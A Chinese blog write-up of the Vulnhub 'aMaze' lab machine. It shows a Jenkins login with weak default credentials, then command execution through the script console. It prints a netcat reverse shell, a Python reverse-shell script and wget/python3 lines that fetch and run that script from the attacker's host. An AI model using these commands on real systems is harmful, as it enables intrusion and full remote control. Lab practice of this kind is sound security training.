Vulnhub靶机:aMaze

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:aMaze(10.0.2.9)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/amaze-1,573/

二、信息收集

使用nmap主机发现靶机ip10.0.2.10

使用nmap端口扫描发现靶机开放端口:21、22、80、8000

80端口使用dirsearch爆破目录,发现一个登录界面

8000端口使用dirsearch爆破目录,每爆破出什么来,打开网站是Jenkins中间件登录界面


三、漏洞利用

jenkins中间件的漏洞网上很多,但尝试了一些poc,都不行。后面尝试弱口令

jenkins/jenkins成功登录。

点击系统管理,下拉找到脚本控制台,点击脚本控制台,执行并打印系统命令

复制代码
println "whoami".execute().text

使用nc反弹shell成功,root权限

复制代码
println "nc -e /bin/bash 10.0.2.15 8888".execute().text

还可以使用python提权,将python脚本通过web上传到靶机,启动nc监听8888端口,并运行

python 复制代码
#!/usr/bin/python
# This is a Python reverse shell script

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.2.15",8888));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/bash","-i"]);
复制代码
#在靶机执行命令
println "wget http://10.0.2.15/shell.py".execute().text
println "python3 shell.py".execute().text

寻找不到flag

相关推荐
其实防守也摸鱼3 小时前
ctfshow--Crypto(funnyrsa1-密码2)解题步骤
python·安全·web安全·网络安全·密码学·web·工具
夏天测5 小时前
2026 年 5 月中旬网络安全深度预警:高危漏洞集中爆发、零日攻击常态化,企业面临多重安全挑战
安全·web安全
QCzblack5 小时前
文件上传upload
web安全
晓梦林7 小时前
HiddenGate靶场学习笔记
笔记·安全·web安全
六月雨滴8 小时前
Oracle 数据库网络安全之加密配置
数据库·web安全·oracle
姬成韶8 小时前
[BUUCTF 2018]Online Tool题目解析
web安全·网络安全·代码审计
ze^010 小时前
Day02 Web应用&架构类别&源码类别&镜像容器&建站模板&编译封装&前后端分离
前端·web安全·架构·安全架构
探索者0111 小时前
SQL注入介绍
web安全·sql注入
ze^01 天前
Day01 Web应用&架构搭建&域名源码&站库分离&MVC模型&解析受限&对应路径
安全·web安全·架构·mvc·安全架构
祁白_1 天前
[BJDCTF2020]Mark loves cat (WriteUp)
web安全·ctf·writeup